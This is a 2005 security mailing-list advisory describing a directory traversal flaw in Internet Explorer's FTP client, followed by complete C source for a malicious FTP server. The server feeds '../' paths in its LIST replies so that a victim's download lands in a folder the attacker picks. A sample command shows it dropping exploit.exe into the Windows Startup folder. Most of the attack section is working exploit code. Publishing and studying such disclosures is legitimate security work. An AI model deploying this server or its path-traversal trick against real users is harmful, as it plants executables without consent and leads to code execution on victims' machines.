Date: 4 Jan 2005 18:27:47 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [NT] Internet Explorer FTP Client Directory Traversal
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Internet Explorer FTP Client Directory Traversal
------------------------------------------------------------------------
SUMMARY
Internet Explorer comes with a built-in FTP client. Internet Explorer's
FTP client has been found to contain a directory traversal vulnerability
that can be used to cause a user to download a malicious executable to any
directory the owner of the FTP server desires him to download the file to
(without the user's consent).
DETAILS
Vulnerable Systems:
* Internet Explorer version 6.0.3790.0 and prior
Internet Explorer's file trivial function allows a remote attacker with an
FTP server to cause a client that innocently downloads a file to overwrite
and/or create a file under any folder he desires by issuing a directory
traversal attack against the client.
The attack happens if any of the following methods of download is used:
* Right click -> "Copy to Folder"
* Drag and Drop
In either case the folder to which the file is stored to, will be
different from the one the user requested the file to be stored in.
Exploit:
A sample command line to run this exploit code:
/ftp_dir_tra ./exploit.exe '\Documents and settings\All Users\Start
menu\Programs\Startup\exploit.exe'
/*
* Internet Explorer FTP download path disclosure fucked prof of concept
(7a69Adv#17)
*
* DOES NOT WORK USING PASV MODE, YOU MUST CODE IT IF YOU WANT !!!
*
*/
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#define MAX_BUF 1024
#define FTP_PORT 21
int main(int argc, char **argv) {
char ch;
char buffer[MAX_BUF + 1];
char ipbuf[MAX_BUF + 1];
char *local_file, *remote_file;
int sfdmain, sfdses, sfddata;
int readed;
int ip1,ip2,ip3,ip4,port1,port2;
int fd;
struct stat st;
struct sockaddr_in ftpmain = { AF_INET, htons(FTP_PORT), INADDR_ANY };
struct sockaddr_in ftpdata;
if (argc < 3) {
printf("\t7a69Adv#17 - Internet Explorer FTP download path disclosure
prof of concept\n");
printf("Use:\n");
printf("\t%s <local_file> <remote_file>\n", argv[0]);
exit(0);
}
local_file = argv[1];
remote_file = argv[2];
if ((fd = open(local_file, O_RDONLY)) == -1) {
perror("open()");
exit(-1);
}
if ((sfdmain = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
if (bind(sfdmain, (struct sockaddr *)&ftpmain, sizeof(struct sockaddr))
== -1) {
perror("bind()");
exit(-1);
}
if (listen(sfdmain, 1) == -1) {
perror("listen()");
exit(-1);
}
if ((sfdses = accept(sfdmain, NULL, NULL)) == -1) {
perror("accept()");
exit(-1);
}
write(sfdses, "200 OK\r\n", 8);
while ((readed = read(sfdses, buffer, MAX_BUF)) > 0) {
buffer[readed] = 0;
printf(">> %s", buffer);
if (!strncmp(buffer, "noop", 4)) write(sfdses, "200 OK\r\n", 8);
else if (!strncmp(buffer, "USER ", 5)) write(sfdses, "331 OK\r\n", 8);
else if (!strncmp(buffer, "PASS ", 5)) write(sfdses, "230 OK\r\n", 8);
else if (!strncmp(buffer, "CWD ", 4)) write(sfdses, "250 OK\r\n", 8);
else if (!strncmp(buffer, "PWD", 3)) write(sfdses, "257 \"/\"\r\n", 9);
else if (!strncmp(buffer, "TYPE ", 5)) write(sfdses, "200 OK\r\n", 8);
else if (!strncmp(buffer, "PORT ", 5)) {
sscanf(&buffer[5], "%i,%i,%i,%i,%i,%i", &ip1, &ip2, &ip3, &ip4, &port1,
&port2);
snprintf(ipbuf, MAX_BUF, "%i.%i.%i.%i", ip1, ip2, ip3, ip4);
ftpdata.sin_family = AF_INET;
ftpdata.sin_addr.s_addr = inet_addr(ipbuf);
ftpdata.sin_port = htons(port1*256+port2);
if ((sfddata = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
if (connect(sfddata, (struct sockaddr *)&ftpdata, sizeof(struct
sockaddr)) == -1) {
write(sfdses, "421 OK\r\n", 8);
} else {
write(sfdses, "220 OK\r\n", 8);
}
}
else if (!strncmp(buffer, "LIST", 4)) {
write(sfdses, "150 OK\r\n", 8);
snprintf(buffer, MAX_BUF, "-rwxrwxrwx 1 0 0 1
Dec 08 07:36 /../../../../../../../../../../..%s\r\n", remote_file);
write(sfddata, buffer, strlen(buffer));
close(sfddata);
write(sfdses, "226 OK\r\n", 8);
}
else if(!strncmp(buffer, "RETR ", 5)) {
write(sfdses, "150 OK\r\n", 8);
fstat(fd, &st);
while(st.st_size-- > 0) {
read(fd, &ch, 1);
write(sfddata, &ch, 1);
}
close(sfddata);
write(sfdses, "226 OK\r\n", 8);
}
else if (!strncmp(buffer, "QUIT", 4)) {
write(sfdses, "221 OK\r\n", 8);
close(sfdses); close(sfdmain); close(sfddata);
}
else
write(sfdses, "500 WTF\r\n", 9);
}
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:ripe@7a69ezine.org.> Albert
Puigsech Galicia.
The original article can be found at:
<http://www.7a69ezine.org/node/view/176>;
http://www.7a69ezine.org/node/view/176
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
